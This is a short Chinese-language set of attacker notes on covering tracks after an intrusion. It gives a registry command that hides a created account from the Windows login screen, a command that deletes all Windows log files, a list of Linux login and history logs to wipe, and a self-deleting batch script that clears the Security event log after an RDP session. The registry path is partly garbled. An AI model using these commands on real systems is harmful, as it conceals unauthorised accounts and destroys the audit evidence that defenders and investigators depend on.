隐藏痕迹

  1. 禁止在登录界面显示新建帐号
  2. REG ADD “HKEY——LOCAL——MACHINE、SOFTWARE、Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList” /v uname /T REG_DWORD /D 0
  3. del %WINDIR%*.log /a/s/q/f
  4. History
  5. 日志
    • auth.log /secure
    • btmp / wtmp
    • lastlog / faillog
  6. 其他日志和HIDS等
痕迹清理

应用访问日志:应用文件自带的日志文件
登录日志:Windows事件管理器、Linux登录痕迹
操作痕迹:Windows事件管理器、linux history
流量日志:IIS日志、Apache日志、Nginx日志、Tomcat日志

  • psloglist.exe 微软工具箱中可以清理日志的工具
1
2
3
4
5
6
@echo off
echo 请在十五秒内端口远程桌面连接
ping 127.0.0.1 -n 15 >nul
psloglist.exe -c security

del %0
文章目录
  1. 1. 痕迹清理
,